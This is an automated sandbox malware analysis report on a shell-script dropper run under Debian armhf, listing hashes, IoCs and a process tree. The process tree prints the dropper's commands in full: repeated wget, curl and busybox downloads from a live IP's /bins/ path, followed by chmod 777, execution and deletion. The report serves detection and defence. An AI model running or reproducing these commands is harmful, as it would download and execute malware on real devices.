Analysis
-
max time kernel
19s -
max time network
20s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:33
Static task
static1
Behavioral task
behavioral1
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh
-
Size
10KB
-
MD5
766dedc13963c6b6ee0d4904bf619106
-
SHA1
3b93a1c4a9df4d54c75ef3b445ca55244506866c
-
SHA256
506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264
-
SHA512
708c383986fa3596893356ad7ced7c503f4bdab762a319ff71291af63bf23e29ce72ae833bc4f47293c9031f7b78bc55a6a61f9d67585f39fb2412103eb6875b
-
SSDEEP
192:jbYbCQCoCnCuCKCzIkq3VdEZ1KVdEZ1PCQCoCnCuCKCEt:/YbCQCoCnCuCKCzIkqWCQCoCnCuCKCQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 683 chmod 700 chmod 748 chmod 794 chmod 826 chmod 812 chmod 820 chmod 832 chmod 739 chmod 770 chmod 788 chmod 800 chmod 806 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW 684 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc 702 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt 740 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 749 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT 771 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal 789 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 795 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 801 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV 807 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB 813 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF 821 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U 827 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES 833 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES curl File opened for modification /tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW curl File opened for modification /tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc curl File opened for modification /tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt curl File opened for modification /tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV curl File opened for modification /tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF curl File opened for modification /tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U curl File opened for modification /tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517 curl File opened for modification /tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT curl File opened for modification /tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal curl File opened for modification /tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62 curl File opened for modification /tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1 curl File opened for modification /tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB curl
Processes
-
/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh/tmp/506d219f79f14db0465b4833a623725c830e0a6630fe266a075de7af41011264.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:653
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:660
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:680
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:685
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:687
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:688
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:719
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:745
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:763
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:787
-
-
/bin/chmodchmod 777 iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal./iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm iA4eNeQirh7GZpHp5Vog6PJMrzdJt71Sal2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:793
-
-
/bin/chmodchmod 777 TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb62./TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm TZXKJ5jLshQIvtt7BTjJP8ZQwqfoF4Bb622⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:799
-
-
/bin/chmodchmod 777 YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC1./YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm YtfqXTLPZogR4uWDjORFeCOUe06n5LGEC12⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:805
-
-
/bin/chmodchmod 777 jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV./jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm jcwbKsx7INVOgy5Cypj6cJaEClnzoCxQQV2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:811
-
-
/bin/chmodchmod 777 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB./51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm 51UHlyi6CpBPnsKOe0Ak7QO10WH752QyFB2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:819
-
-
/bin/chmodchmod 777 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF./6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 6fIuSLaEdhrpZduQ3q8VWdFNf0YZBoHGcF2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:825
-
-
/bin/chmodchmod 777 LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U./LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm LEN2oHcPC1EXOmtdw8ObBv76IXcaGyW21U2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:831
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:835
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97